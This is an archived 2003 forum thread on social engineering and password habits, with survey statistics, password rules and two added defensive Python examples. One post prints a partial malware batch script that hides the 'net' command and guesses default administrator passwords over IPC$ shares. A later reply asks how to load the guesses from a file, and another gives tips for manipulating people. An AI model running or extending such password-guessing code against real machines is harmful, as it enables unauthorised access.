
Topic awaiting preservation: Just how easy is Social Engineering? (Page 1 of 1)

 
Emperor
Maniac (V) Mad Scientist with Finglongers

From: Cell 53, East Wing
Insane since: Jul 2001

posted 04-26-2003 05:07

The answer appears to be very easy indeed:
www.theregister.co.uk/content/55/30324.html
www.infosec.co.uk/page.cfm/T=m/Action=Press/PressID=255

Here is an interesting overview of Social Engineering:
www.sans.org/rr/social/social.php

and how to defend against it:
www.sans.org/rr/social/defence.php

___________________
Emps

FAQs: Emperor

warjournal
Maniac (V) Mad Scientist

From:
Insane since: Aug 2000

posted 04-26-2003 05:27

"Tales of a Super Hacker" has a good chapter on social engineering.
He broke it down into two types:
1. The hacker needs help from the victim
2. The victim needs help from the hacker

It was a pretty good read.

I've got a link around here somewhere about another kind of social engineering. Has to do with taking advantage of weakness while not bringing suspicion on the self.

I'm off to dig into those links.

edit: Doh! I can't believe the numbers/percentages in those links. That's just plain insane.


[This message has been edited by warjournal (edited 04-26-2003).]

Dracusis
Maniac (V) Inmate

From: Brisbane, Australia
Insane since: Apr 2001

posted 04-26-2003 07:38
quote:
In addition to using their password to gain access to their company information two thirds of workers use the same password for everything, including their personal banking, Web site access, etc.



I'd honestly like to know how anyone could possibly remember a different password for each and every little thing. I use about 6 different passwords, all using the non-dictionary word and broken number rule but I have about 20 different accounts for various things that use passwords. Do they honestly expect people to remember a completely different, non-dictionary word for every account they hold?

I can only see the amount of passwords I need to remember growing over the years. Personally, I think we need to find a better system than a text string for identification if we're going to be using computers more and more every day. The whole idea of a "password" seems to be failing.

Emperor
Maniac (V) Mad Scientist with Finglongers

From: Cell 53, East Wing
Insane since: Jul 2001

posted 04-26-2003 14:17

wj: Yeah those numbers are insane:

quote:
90% of office workers at Waterloo Station gave away their computer password for a cheap pen, compared with 65% last year. Men were slightly more likely to reveal their password with 95% of men and 85% of women giving away their password.



and:

quote:
The most common password was 'password' (12%) and the most popular category was their own name (16%) followed by their football team (11%) and date of birth (8%).



If anyone were looking for an interesting school/college project - then they could do worse than dressing smartly and standing in a central area and running through some similar questions.

Dracusis: Something like smart cards and smart card readers with decent encryption?

___________________
Emps

FAQs: Emperor

CPrompt
Maniac (V) Inmate

From: there...no..there.....
Insane since: May 2001

posted 04-26-2003 14:32

There was an article in the new 2600 about the Smart Card thing as well as the Passport and how to get the passwords. Kind of interesting.

I'm with Dracusis. I can't even remember how old I am much less a password. I just put all my passwords in a "password" protected Word document. However, I also made a VB program that will do 128 bit encryption on text. I just plop the password in the encryption and then paste it to the Word document. So even if you were to get into the Word document, the passwords listed are encrypted.

Not like I really have anything to keep a big secret though.

Later,

C:\


~Binary is best~

warjournal
Maniac (V) Mad Scientist

From:
Insane since: Aug 2000

posted 04-26-2003 15:15

I'm a big fan of MWSnap3. It's an awesome screencap utility. He's also got a program called PINS. I haven't tried it, but it sounds like it might be just the ticket for these blokes.

PINs

Hugh
Paranoid (IV) Inmate

From: Dublin, Ireland
Insane since: Jul 2000

posted 04-26-2003 17:04

I'm just doing a survey Emperor . . . . what's your asylum password ? Don't worry it's for science !

edit: spelling

[This message has been edited by Hugh (edited 04-26-2003).]

Emperor
Maniac (V) Mad Scientist with Finglongers

From: Cell 53, East Wing
Insane since: Jul 2001

posted 04-26-2003 17:26

Hugh: Sure it's 'kissmyhairyass'.

Now as part of my experiment I will make the keyboards explode of the first 3 people to try that password (TP: turn on the Remote Keyboard Exploding Module we have some live ones).

___________________
Emps

FAQs: Emperor

Emperor
Maniac (V) Mad Scientist with Finglongers

From: Cell 53, East Wing
Insane since: Jul 2001

posted 04-26-2003 19:41

OK I created a quick section on passwords with a couple of FAQs (feel free to add to them):

:FAQ:

___________________
Emps

FAQs: Emperor

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted 04-27-2003 05:23

My friends and I were discussing this the other day (yeah, we're geeks), and the topic came up about password rules. It works a little like this-

You first figure out a rule for ALL of your passwords. For example: My rule could be a two word phrase surrounded (each word) by capital Ks, the second to last letter of each word capitalized and my age backwards in the middle.

So now, I only need to memorize my password in simple English (it can be as stupid as necessary) and the rule (easy to do, since it's the same for every password). Let's try some easy to remember passwords-

KozoNeK02KasylUmK
KdoctOrK02KozoNeK
KYoK02KmomMaK
KMyK02KfavoriTeK02computErK
KwoRkK02KsucKsK

...and so on...

As long as I remember my rule... remembering my passwords is easy- because they CAN be as stupid as I want. E.g. my name, rank, mother's maiden name (twice), or whatever (or even the words "What" "ever"!)


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted 04-27-2003 05:26

By the way (A little more on topic), The Art of Deception is out, written by none other than Kevin Mitnick... I sat down to read some of it in Borders and it was pretty good..


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

platyjim
Bipolar (III) Inmate

From: Fromsville
Insane since: Feb 2003

posted 04-27-2003 06:13

From what I've heard Mitnick wasn't that great at technical things. He was just good at social engineering and the only reason he got famous was because of him running from the cops. I haven't done all that much research on him though so I could be wrong.

WarMage
Maniac (V) Mad Scientist

From: Rochester, New York, USA
Insane since: May 2000

posted 04-27-2003 06:36

I have accounts all over the place. I would say at least a good 50 accounts all over the place. I have about 2 passwords that I use for around 45 of these accounts. They are both completely simple passwords that I would bet anyone could break given a limited amount of time with a brute force cracker. I am not too upset with this, since I only use this username and password for sites and accounts that have no real meaning to me. My spam email account, my registration for the stupid joke site, or for the New York Times, the registration for the free online photo service, or anything else free, that doesn't require me to give away personal information (or that I can fake my personal info, since I am always Mr. Joe Blow).

The other 5 or 6 accounts have three passwords that cover varying levels of access. I have my computer's root password, which changes every two months, which follows all the good password rules. I have the secondary password which I use to keep my critical email accounts under control, and I have two financial accounts, whose passwords are terribly long, and terribly complex.

I also like to run a password cracker on my passwords. To figure out how long it takes to brute force them. It tends to be weeks. This is not a bad deal, as most authentication systems (that protect critical information) have a three to five minute timeout when you have three failed accesses to an account. Which would then make the attempts take months to crack. As a cracker could run 3 passwords in less than a second (which I am sure is an absurdly low number given computer speeds today).

For my two weeks of cracking we would have 1209600 seconds. Which could say that we tried about 3.6 million passwords in two weeks (again an insanely small number). But would still require that a standard two week brute force would take 300 times as many seconds to crack with a 5 minute cooldown before another series of 3 passwords could be entered. Which would be about a year and a half to brute force crack. Which in that amount of time my password would be changed a half a dozen times.

So now that I am done ranting about time and numbers. Make sure any vital information is kept under lock and key, or at least where it can not be accessed. I know people who put passwords to vital information on disks or on those USB storage cards. That way you can have some insanely complex password that you can easily copy and paste into your password field.


Me
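
A model of the lockout policy described in the post above, as an added example that is not part of the thread: three failed logons lock the account for five minutes, and the functions measure how long an online guesser spends waiting out locks. It assumes the time per guess is negligible next to the lock; `LockoutPolicy`, `simulate_wrong_guesses` and `lockout_delay` are hypothetical names.

```python
class LockoutPolicy:
    """Lock an account for lock_seconds after max_failures failed logons."""

    def __init__(self, max_failures=3, lock_seconds=300):
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.failures = {}      # account -> failures since last success or lock
        self.locked_until = {}  # account -> time (seconds) the lock expires

    def attempt(self, account, password_ok, now):
        """Return 'locked', 'ok' or 'fail' for a logon at time `now`."""
        if now < self.locked_until.get(account, 0):
            return "locked"     # rejected before the password is even checked
        if password_ok:
            self.failures[account] = 0
            return "ok"
        count = self.failures.get(account, 0) + 1
        if count >= self.max_failures:
            self.locked_until[account] = now + self.lock_seconds
            count = 0
        self.failures[account] = count
        return "fail"


def simulate_wrong_guesses(guesses, policy, account="target"):
    """Seconds spent waiting out locks to get `guesses` wrong passwords checked."""
    now = 0
    for _ in range(guesses):
        if policy.attempt(account, False, now) == "locked":
            now = policy.locked_until[account]  # wait for the lock to expire
            policy.attempt(account, False, now)
    return now


def lockout_delay(guesses, max_failures=3, lock_seconds=300):
    """Closed form of the simulation: one lock per full batch before the last guess."""
    if guesses <= 0:
        return 0
    return ((guesses - 1) // max_failures) * lock_seconds


if __name__ == "__main__":
    # Figures from the post: 3 guesses per second for 1,209,600 seconds.
    guesses = 3 * 1_209_600
    seconds = lockout_delay(guesses)
    print(guesses, "guesses ->", seconds, "s =", round(seconds / 86400), "days")
```

With the post's figures (3 guesses per second for 1,209,600 seconds, 3 failures, a 5-minute lock) `lockout_delay` returns 362,879,700 seconds, about 11.5 years of waiting.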

Emperor
Maniac (V) Mad Scientist with Finglongers

From: Cell 53, East Wing
Insane since: Jul 2001

posted 04-27-2003 15:33

This article (where I picked up the info about the survey) discusses using passwords based on rules:
www.guardian.co.uk/online/story/0,3605,941794,00.html

which tends to support PS' idea

About Mitnick: In this older article:
www.guardian.co.uk/online/story/0,3605,879884,00.html

he says:

quote:
I was so successful in that line of attack [Social Engineering] that I rarely had to resort to a technical attack.



___________________
Emps

FAQs: Emperor

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted 04-27-2003 18:11

yeah, the book is about social engineering, not about technical hacking.... it looks pretty good..



Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

Rooster
Bipolar (III) Inmate

From: the uterus
Insane since: Nov 2002

posted 04-28-2003 06:47

I have a perfect example of this...

I recently had to reformat my harddrive and reinstall everything, mainly due to a few computer problems that have been festering for a few months now. Not big problems, just the usual annoyances with the clutter that collects on a windows box.

To my knowledge I have never gotten a computer virus. I use this computer many hours a day; I clean it, nurse it and live with it... many hours a day. I'd like to think I would know if it had a problem. I also have no firewall nor do I have any anti-virus protection... not the best considering that this computer never gets turned off and it's (used to be) always connected to the internet.

Well my time for a virus came the other day, about an hour after I reinstalled windows and was working on installing an old MS-DOS program I use a lot for work.

I somehow got one of the numerous versions of backdoor-JZ. The virus has a low risk of data loss and is used as a way for someone to gain access to your computer at a later time. It installs itself, changes registry values and then changes security settings (I have a win2000 box) to fit its needs.

I'm just one of those people who wish others had the respect to live and let live. I leave my house unlocked, my car unlocked and before this the password to my computer used to be, "" (nothing) which might be typical for a ~personal~ computer user.

My password has now been changed to something very long. One of the many virus files I quarantined on my computer is a script file that is used to guess the administrator's password to change some of the security settings.

I think it's a rather good example of social engineering (sort of), this is only a partial listing...


code:
@echo off
set D=n
set C=e
set K=t
%D%%C%%K% use \\%1\ipc$ "" /user:Administrator
if not errorlevel 1 goto asp1
%D%%C%%K% use \\%1\ipc$ "Administrator" /user:Administrator
if not errorlevel 1 goto asp2
%D%%C%%K% use \\%1\ipc$ "admin" /user:Administrator
if not errorlevel 1 goto asp3
%D%%C%%K% use \\%1\ipc$ "admin123" /user:Administrator
if not errorlevel 1 goto asp4
%D%%C%%K% use \\%1\ipc$ "changeme" /user:Administrator
if not errorlevel 1 goto asp5
%D%%C%%K% use \\%1\ipc$ "secret" /user:Administrator
if not errorlevel 1 goto asp6
%D%%C%%K% use \\%1\ipc$ "mail" /user:Administrator
if not errorlevel 1 goto asp7
%D%%C%%K% use \\%1\ipc$ "test" /user:Administrator
if not errorlevel 1 goto asp8
%D%%C%%K% use \\%1\ipc$ "test123" /user:Administrator
if not errorlevel 1 goto asp9
%D%%C%%K% use \\%1\ipc$ "temp" /user:Administrator
if not errorlevel 1 goto asp10
%D%%C%%K% use \\%1\ipc$ "temp123" /user:Administrator
if not errorlevel 1 goto asp11
%D%%C%%K% use \\%1\ipc$ "pass" /user:Administrator
if not errorlevel 1 goto asp12
%D%%C%%K% use \\%1\ipc$ "password" /user:Administrator
if not errorlevel 1 goto asp13
%D%%C%%K% use \\%1\ipc$ "password123" /user:Administrator
if not errorlevel 1 goto asp14
%D%%C%%K% use \\%1\ipc$ "123" /user:Administrator
if not errorlevel 1 goto asp15
%D%%C%%K% use \\%1\ipc$ "321" /user:Administrator
if not errorlevel 1 goto asp16
%D%%C%%K% use \\%1\ipc$ "12345" /user:Administrator
if not errorlevel 1 goto asp17
%D%%C%%K% use \\%1\ipc$ "54321" /user:Administrator
if not errorlevel 1 goto asp18
%D%%C%%K% use \\%1\ipc$ "12345abc" /user:Administrator
if not errorlevel 1 goto asp19
%D%%C%%K% use \\%1\ipc$ "123456" /user:Administrator
if not errorlevel 1 goto asp20
%D%%C%%K% use \\%1\ipc$ "654321" /user:Administrator
if not errorlevel 1 goto asp21
%D%%C%%K% use \\%1\ipc$ "abc123" /user:Administrator
if not errorlevel 1 goto asp22
%D%%C%%K% use \\%1\ipc$ "red123" /user:Administrator
if not errorlevel 1 goto asp23
%D%%C%%K% use \\%1\ipc$ "qwerty" /user:Administrator
if not errorlevel 1 goto asp24
%D%%C%%K% use \\%1\ipc$ "asdf" /user:Administrator
if not errorlevel 1 goto asp25
%D%%C%%K% use \\%1\ipc$ "asdfghjkl" /user:Administrator
if not errorlevel 1 goto asp26
%D%%C%%K% use \\%1\ipc$ "qwertyuiop" /user:Administrator
if not errorlevel 1 goto asp27
%D%%C%%K% use \\%1\ipc$ "" /user:admin
if not errorlevel 1 goto asp28
%D%%C%%K% use \\%1\ipc$ "admin" /user:admin
if not errorlevel 1 goto asp29
%D%%C%%K% use \\%1\ipc$ "" /user:root
if not errorlevel 1 goto asp30
%D%%C%%K% use \\%1\ipc$ "root" /user:root
if not errorlevel 1 goto asp31
%D%%C%%K% use \\%1\ipc$ "" /user:test
if not errorlevel 1 goto asp32
%D%%C%%K% use \\%1\ipc$ "test" /user:test
if not errorlevel 1 goto asp33
%D%%C%%K% use \\%1\ipc$ "" /user:Owner
if not errorlevel 1 goto asp34
%D%%C%%K% use \\%1\ipc$ "Owner" /user:Owner
if not errorlevel 1 goto asp35
%D%%C%%K% use \\%1\ipc$ "" /user:Server
if not errorlevel 1 goto asp36
%D%%C%%K% use \\%1\ipc$ "Server" /user:Server
if not errorlevel 1 goto asp37






[This message has been edited by Rooster (edited 04-28-2003).]
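
The defender's view of the listing above, as an added example that is not part of the thread: a burst of failed logons from one source against the built-in account names the script cycles through, followed by a success, is the pattern to alert on. The log format, the threshold and the function names are assumptions made for this example, and the sample events are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Account names the quarantined script cycles through (from the listing above).
TARGETED_ACCOUNTS = {"administrator", "admin", "root", "test", "owner", "server"}

# Constructed sample events, "time,source,account,result". The format is an
# assumption for this example, not a real Windows log layout.
SAMPLE_LOG = """\
2003-04-28T06:10:00,192.0.2.10,alice,FAIL
2003-04-28T06:10:09,192.0.2.10,alice,OK
2003-04-28T06:12:00,198.51.100.7,Administrator,FAIL
2003-04-28T06:12:01,198.51.100.7,Administrator,FAIL
2003-04-28T06:12:02,198.51.100.7,Administrator,FAIL
2003-04-28T06:12:03,198.51.100.7,Administrator,FAIL
2003-04-28T06:12:04,198.51.100.7,admin,FAIL
2003-04-28T06:12:05,198.51.100.7,root,FAIL
2003-04-28T06:12:06,198.51.100.7,test,OK
2003-04-28T06:20:00,203.0.113.5,Administrator,FAIL
2003-04-28T06:45:00,203.0.113.5,Administrator,FAIL
2003-04-28T06:45:20,203.0.113.5,Administrator,OK
"""


def parse(line):
    ts, source, account, result = line.strip().split(",")
    return datetime.fromisoformat(ts), source, account.lower(), result == "OK"


def detect_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert on sources with >= threshold failed logons to targeted accounts
    inside `window`, and record a success that lands during the burst."""
    recent = defaultdict(deque)  # source -> times of recent targeted failures
    alerts = {}                  # source -> alert record
    for line in lines:
        if not line.strip():
            continue
        ts, source, account, ok = parse(line)
        burst = recent[source]
        while burst and ts - burst[0] > window:
            burst.popleft()      # forget failures older than the window
        if ok:
            if source in alerts and burst:
                alerts[source]["success_as"] = account  # a guess probably worked
            continue
        if account not in TARGETED_ACCOUNTS:
            continue
        burst.append(ts)
        if len(burst) >= threshold:
            alert = alerts.setdefault(
                source, {"source": source, "first_seen": burst[0],
                         "failures": 0, "success_as": None})
            alert["failures"] = max(alert["failures"], len(burst))
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG.splitlines()):
        print(alert)
```

Only the middle source is flagged in the sample: the single mistyped password and the two administrator failures 25 minutes apart stay below the threshold.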

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted 04-29-2003 19:05

not condoning the 'hacking' or anything at all, just looking at the code and thinking-

I think it should be possible to put all those 'could be the password' strings in a 'newline-delimited' separate file..

methink that looks like a batch file... how would you do that in a batch file (opening and reading a file)?


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

Trigger
Paranoid (IV) Inmate

From:
Insane since: Jun 2002

posted 04-29-2003 19:20

Mitnick's considered a god around the Phreak community, well the UK Phreaking community at least, solely because he was a great Social Engineer rather than a 'hacker' like some believe

Thanks
Trigger

bitdamaged
Maniac (V) Mad Scientist

From: 100101010011 <-- right about here
Insane since: Mar 2000

posted 04-29-2003 19:28

One note about the numbers earlier.

A guy walks up to you at the train station and says "hey if you tell me your computer password and I'll give you this pen!"

What do you say? I'm thinking my response would be s-u-c-k-e-r as I walk off with his pen



.:[ Never resist a perfect moment ]:.

Trigger
Paranoid (IV) Inmate

From:
Insane since: Jun 2002

posted 04-29-2003 20:06

Bit, that's kind of an exaggeration to make the workers sound really dumb, no doubt a bit of SE was involved,
I don't think anyone's dumb enough to have any guy go to you
"Hey what's your password?.. if you give it to me I'll give you a nice new shiny pen "
and then you tell him your password... .

Thanks
Trigger

Emperor
Maniac (V) Mad Scientist with Finglongers

From: Cell 53, East Wing
Insane since: Jul 2001

posted 04-29-2003 20:25

bd ably demonstrates why Social Engineering can't be done by just anyone

___________________
Emps

FAQs: Emperor

bitdamaged
Maniac (V) Mad Scientist

From: 100101010011 <-- right about here
Insane since: Mar 2000

posted 04-29-2003 20:51

Actually I'm trying to give the workers some credit.

I was trying to say that no one checked the validity of the passwords that were given. If someone offered me something for my password like this I'd just give them a fake one and take the pen.



.:[ Never resist a perfect moment ]:.

Wolfen
Paranoid (IV) Inmate

From: Minnesota
Insane since: Jan 2001

posted 04-29-2003 22:20

Just thought I would add this in for a bit of humor on social engineering.... From the movie 'Hackers.'

NORM: Security, uh Norm, Norm speaking.

DADE: Norman? This is Mr. Eddie Vedder, from Accounting. I just had a power surge here at home that wiped out a file I was working on. Listen, I'm in big trouble, do you know anything about computers?

NORM: Uhhmmm... uh gee, uh...

DADE: Right, well my BLT drive on my computer just went AWOL, and I've got this big project due tomorrow for Mr. Kawasaki, and if I don't get it in, he's gonna ask me to commit Hari Kari...

NORM: Uhhh.. ahahaha...

DADE: Yeah, well, you know these Japanese management techniques. Could you, uh, read me the number on the modem?

NORM: Uhhhmm...

DADE: It's a little boxy thing, Norm, with switches on it... lets my computer talk to the there...

NORM: 212-555-4240.

I have not done any hacking before, but you would be surprised at how stupid some people can be.... In the immortal words of P.T. Barnum, 'There is a sucker born every minute.'

[This message has been edited by Wolfen (edited 04-29-2003).]

WebShaman
Maniac (V) Mad Scientist

From: Happy Hunting Grounds...
Insane since: Mar 2001

posted 04-30-2003 07:11

It's actually much easier than most people think...but then, I've never done Social Engineering for hacking purposes...just for...others.

As long as you come from a position of 'authority', and sound like you know what you are talking about...most people drop their defences pretty fast. A 'sincere' and sympathetic approach works just about every time...

Always let your 'victim' offer information...never directly ask. Provide a problem, and let them provide a solution...get their brain busy with something other than the intended information...present situations where they can help out...

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted 04-30-2003 13:56

Well, trib posted this here and I thought it perfectly fitting...
http://www.trib-design.com/quality.mp3

btw, trib- thanks.... I laughed my ass off...


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342
